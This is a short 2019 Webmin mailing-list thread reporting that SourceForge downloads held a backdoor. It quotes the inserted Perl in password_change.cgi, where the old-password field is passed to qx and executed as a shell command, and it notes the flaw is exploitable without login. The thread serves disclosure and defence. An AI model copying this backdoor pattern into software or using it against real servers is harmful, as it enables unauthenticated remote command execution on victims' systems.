Re: [webmin-l] Compromised Downloads

[Adam H. <ad...@gm...>]

>From my testing you can exploit it without knowing the password or even a
username

On Sat, Aug 17, 2019 at 5:35 PM Jamie Cameron <jca...@we...> wrote:

> Thanks, I'm looking into this now. I'm guessing off hand that it's not
> remotely exploitable without an existing login since the password change
> cgi can't be run unless your already logged in.
>
> On Aug 17, 2019 1:29 PM, Adam Hostetler <ad...@gm...> wrote:
>
> I believe the downloads hosted by source forge are compromised. They
> contain a backdoor in the password_change.cgi, this is related to the
> "0day" a few days ago. The code does not appear in the current github repo
> nor in any commits in the past.
>
> Backdoor code:
> if ($wuser) {
>         # Update Webmin user's password
>         $enc = &acl::encrypt_password($in{'old'}, $wuser->{'pass'});
>         $enc eq $wuser->{'pass'} ||
> &pass_error($text{'password_eold'},qx/$in{'old'}/);
>         $perr = &acl::check_password_restrictions($in{'user'},
> $in{'new1'});
>         $perr && &pass_error(&text('password_enewpass', $perr));
>         $wuser->{'pass'} = &acl::encrypt_password($in{'new1'});
>
> "old" password is passed to qx, which executes it as a system command
>
> See
> https://www.reddit.com/r/netsec/comments/crk77z/0day_remote_code_execution_for_webmin/
>
>
> -
> Forwarded by the Webmin mailing list at
> web...@li...
> To remove yourself from this list, go to
> http://lists.sourceforge.net/lists/listinfo/webadmin-list
>